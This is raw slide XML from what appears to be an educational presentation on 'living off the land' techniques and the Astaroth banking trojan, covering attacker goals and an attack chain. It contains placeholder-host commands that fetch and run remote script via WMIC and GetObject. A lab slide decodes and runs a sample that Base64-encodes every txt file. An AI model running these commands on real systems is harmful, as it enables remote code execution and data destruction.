            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452678" y="1671373"/>
            <a:ext cx="5243616" cy="4982346"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The Cons of a common attack or in physical terms a “Smash and Grab Job”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Noisy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Commonly remediated by compensating controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Harder to achieve bigger objectives on bigger institutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Traditional remediation plans and detection logic in place to detect common attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Malware analysis and reverse engineering can curate Indicators of compromise that can be attributed to the adversary (Leads to preventing future attacks and event potential arrests and legal or criminal penalties. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Benefits of living off the land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Attributed to living by eating the available food on the land, adversaries and malware creators take advantage of the computer’s built-in tools and utilities as introduced at DerbyCon3 in 2013. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Utilized signed programs scripts and libraries to blend in and evade defensive controls to perform Reconnaissance, Filer operations, arbitrary code execution, lateral movement, and other compensating control bypass techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Hide in plain sight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Commonly attributed to privilege escalation, pivoting, and information exfiltration such as intellectual property or other personal information for monetization.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 13">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7" name="Picture 6" descr="A group of people watching a person on a television&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF8C6850-024A-2310-CC7D-1ADAFD39E79E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="18394" r="3692"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7901259" y="2727729"/>
            <a:ext cx="4290741"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p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Arc 15">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Picture 4" descr="A picture containing text, cluttered&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD8200A-BE13-3760-BF2C-52D2616CDBE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="12814" r="4990" b="-3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="62616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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2949129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4CC2CA0-A7A1-BB62-1D90-0A3B5A39B85C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="261479"/>
            <a:ext cx="3429000" cy="2097113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Goals of Living off the Land</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3054EAE-5A6C-9B47-34F4-C039D9984E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6942" y="1310035"/>
            <a:ext cx="6903720" cy="3952379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DA2BEF-E0E3-599A-BFB5-3593750B591F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371338" y="2879587"/>
            <a:ext cx="5098656" cy="3690869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The biggest goal attributed to living off the land is to delay step 1 where the victim discovers the malware or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>PuP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> as long as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Being fileless leave the least about of IOCS as possible, erase logs and tracks, VPN node exit IPS, hide persistence in less common areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Hide as much information about the adversary in the attack such as binary comments, IPS, domains, and language packs, and utilize techniques such as fileless attacks and obfuscation to make it difficult to reverse engineer    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Exfiltrate as much information as possible with common inbound and outbound traffic such as youtube.com in example in next slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FF7136-BEFA-E0A6-C23A-0D5793A82372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5841332" y="5593269"/>
            <a:ext cx="6097656" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.recordedfuture.com/blog/diamond-model-intrusion-analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2082816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4F2FC05-7D27-410F-BDA9-ADF4831368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3" y="633619"/>
            <a:ext cx="5457817"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F779AE-CD48-533A-A3F1-EBBEB88C67D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="978408"/>
            <a:ext cx="4607052" cy="1106424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900"/>
              <a:t>Astaroth: Banking Trojan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">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6" y="2185416"/>
            <a:ext cx="4446484"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7E6AD77-BF6B-99A5-60A7-5B3DFE9E35CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607781" y="2295144"/>
            <a:ext cx="4966167" cy="3689700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Astaroth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>information stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> known to steal account credentials, keystrokes, social security information, financial data, addresses, names, crypto wallets, and any other PII that can be exfiltrated for malicious intent with multiple various advanced techniques such as anti-debugging, anti0virtualization, anti-emulation tricks, process hollowing, NTFS Alternate Data Streams and Living of the land binaries for different functionalities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Utilizes WMIC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>BITSadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>Certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, and Regsvr32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>First signatures found in South America which spread internationally widening the net from Banks to multiple different sectors around the world. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Command examples: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0" err="1"/>
              <a:t>windir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0"/>
              <a:t>%\Explorer /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0" err="1"/>
              <a:t>GetObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0" err="1"/>
              <a:t>script:https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0"/>
              <a:t>://{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0" err="1"/>
              <a:t>urlthatholdsthemainjavascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" u="sng" dirty="0"/>
              <a:t>}’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>wmic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t> get /format:”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>hxxps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>://webserver/payload.xsl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>(Microsoft, 2020).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Map&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2EE35B6-E046-D2EC-59D1-F22A28A32E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="3" b="164"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6312023" y="91451"/>
            <a:ext cx="5457817" cy="3337549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A picture containing ground&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{247188CA-AE7E-1E5E-7C92-EC2012AA33F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="7345" r="3" b="3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324590" y="3520439"/>
            <a:ext cx="5457817" cy="3337561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1618941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9" name="Group 18">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20" name="Rectangle 19">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0">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3" name="Rectangle 22">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6FF9D3B-ABE3-ECB0-D533-715D99E535D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057025" y="922644"/>
            <a:ext cx="5040285" cy="1169585"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3700"/>
              <a:t>Astaroth: Attack Chain 2020</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">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C4A389D-9AA5-AFE9-74F9-84A4AB91B5F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055715" y="2508105"/>
            <a:ext cx="5040285" cy="3632493"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Astaroth would send a spear phishing link with a malicious zipped attachment that when opened would open a link that would execute an obfuscated BAT file to pursue the following: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Run Windows Management Instrumentation (WMIC) command to download and run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Abuse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>BITSadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to download multiple binaries which would reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> channel descriptions to hide their Command-and-control server commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>BITSadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to also establish persistence with sneaky active directory techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Utilize curtail tool to decode the downloaded payloads into DLL files hidden across the machine's different directories </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Finally execute those DLL files with the Regsvr32 command. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>Elsad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, 2021)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Diagram, schematic&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DFFED32-867B-DD6B-18E7-D573B9AC10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0684" y="396586"/>
            <a:ext cx="4161085" cy="3391285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB77DB9-01E0-96BE-1B3D-C96871BC9C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1978" y="3884456"/>
            <a:ext cx="3949791" cy="2491407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="734496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22" name="Rectangle 21">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5" name="Rectangle 24">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B83106F-B9F3-641C-7B0D-4BBBE105DCBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057025" y="922644"/>
            <a:ext cx="5040285" cy="1169585"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>On your Host Today:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26">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8755C01-47A4-F2D6-6D74-2CC4D199E7BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055715" y="2508105"/>
            <a:ext cx="5040285" cy="3632493"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>A Certutil encoded document is on your desktop referencing a fun payload! Let’s get started:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>(Warning, executing this will Base64 encode all of the context of your txt documents recursively, use responsibly!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Create a Txt document with random string contents and save it to your desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Open Powershell and cd to the Desktop and run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Certutil decode.\encoded_document.txt JoJoMalaware.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>After confirming that a new executable is on the Desktop let’s use some living-off-the-land techniques to execute it! Starting off with the noisiest but easiest way is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Explorer.exe .\JoJoMalaware.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Reopen that Temp document and you’ll find it to be base64 encoded!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A585D7A-8FFC-1367-9512-40FED2672A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6095" y="774285"/>
            <a:ext cx="4387174" cy="2581173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A computer screen capture&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A6ACEF-BFA3-8B1D-8901-3EDFD870BB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6095" y="3575074"/>
            <a:ext cx="4387174" cy="2581173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="904814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4290D-87B1-A021-333F-70950F0078A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More resources on Astaroth and Living Off Land</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
